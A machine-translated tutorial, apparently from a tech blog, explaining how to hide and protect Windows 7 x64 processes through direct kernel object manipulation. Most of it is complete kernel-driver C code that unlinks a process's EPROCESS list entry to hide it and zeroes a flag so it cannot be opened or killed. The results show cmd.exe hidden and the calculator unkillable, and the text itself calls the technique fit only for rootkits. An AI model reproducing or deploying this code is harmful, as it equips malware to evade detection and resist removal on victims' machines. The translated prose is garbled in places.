DKOM Hiding and protecting processes
The main operation is the linked list , Node content and modification .
DKOM The essence of hiding process and protecting process is operation EPROCESS structural morphology , When using different systems, pay attention to the relevant definitions , Determine down offset , The following data is based on win7 64 take as an example .
shut notes Two individual become member : ActiveProcessLinks and Flag .
ActiveProcessLinks Put each EPROCESS The structure is connected into “ Double linked list ”,ZwQuerySystemInformation
When you enumerate a process, you enumerate this linked list , If a EPROCESS Remove from it ,ZwQuerySystemInformation
You can't enumerate the processes that have been disconnected , And depending on this function RING3 The enumeration process function of is also invalid ; But Flag Set up 0 after ,OpenProcess
The function returns a failure . But it's important to note that , use use DKOM To protect the process can be very dangerous , For example call CreateProcess
Meeting fail , and process sign out but If you don't remove the protection , There is a certain probability that blue screen will be caused . in a word ,DKOM Protection process and Hide process Only for ROOTKIT
, It does not apply to regular software . The code for hiding and protecting processes is as follows :
NTKERNELAPI NTSTATUS PsLookupProcessByProcessId(HANDLE ProcessId, PEPROCESS
*Process); NTKERNELAPI CHAR* PsGetProcessImageFileName(PEPROCESS Process);
// Target process PEPROCESS audiodg=NULL, dwm=NULL; ULONG op_dat; // Offset definition #define
PROCESS_ACTIVE_PROCESS_LINKS_OFFSET 0x188 #define PROCESS_FLAG_OFFSET 0x440
// get EPROCESS PEPROCESS GetProcessObjectByName(char *name) { SIZE_T i;
for(i=100;i<20000;i+=4) { NTSTATUS st; PEPROCESS ep;
st=PsLookupProcessByProcessId((HANDLE)i,&ep); if(NT_SUCCESS(st)) { char
*pn=PsGetProcessImageFileName(ep); if(_stricmp(pn,name)==0) return ep; } }
return NULL; } // Removes the specified item from a doubly linked list VOID RemoveListEntry(PLIST_ENTRY ListEntry) { KIRQL
OldIrql; OldIrql = KeRaiseIrqlToDpcLevel(); if (ListEntry->Flink != ListEntry
&& ListEntry->Blink != ListEntry && ListEntry->Blink->Flink == ListEntry &&
ListEntry->Flink->Blink == ListEntry) { ListEntry->Flink->Blink =
ListEntry->Blink; ListEntry->Blink->Flink = ListEntry->Flink; ListEntry->Flink
= ListEntry; ListEntry->Blink = ListEntry; } KeLowerIrql(OldIrql); } // Hide process
VOID HideProcess(PEPROCESS Process) {
RemoveListEntry((PLIST_ENTRY)((ULONG64)Process+PROCESS_ACTIVE_PROCESS_LINKS_OFFSET));
} // Protection process ULONG ProtectProcess(PEPROCESS Process, BOOLEAN bIsProtect, ULONG v) {
ULONG op; if(bIsProtect) { op=*(PULONG)((ULONG64)Process+PROCESS_FLAG_OFFSET);
*(PULONG)((ULONG64)Process+PROCESS_FLAG_OFFSET)=0; return op; } else {
*(PULONG)((ULONG64)Process+PROCESS_FLAG_OFFSET)=v; return 0; } } VOID test() {
audiodg=GetProcessObjectByName("calc.exe");DbgPrint("calc: %p\n",audiodg);
if(audiodg) { op_dat=ProtectProcess(audiodg,1,0); ObDereferenceObject(audiodg);
} dwm=GetProcessObjectByName("cmd.exe");DbgPrint("cmd: %p\n",dwm); if(dwm) {
HideProcess(dwm); ObDereferenceObject(dwm); } }
results of enforcement : The calculator won't end ,cmd.exe There is no process
however cmd There is this :
Technology
Daily Recommendation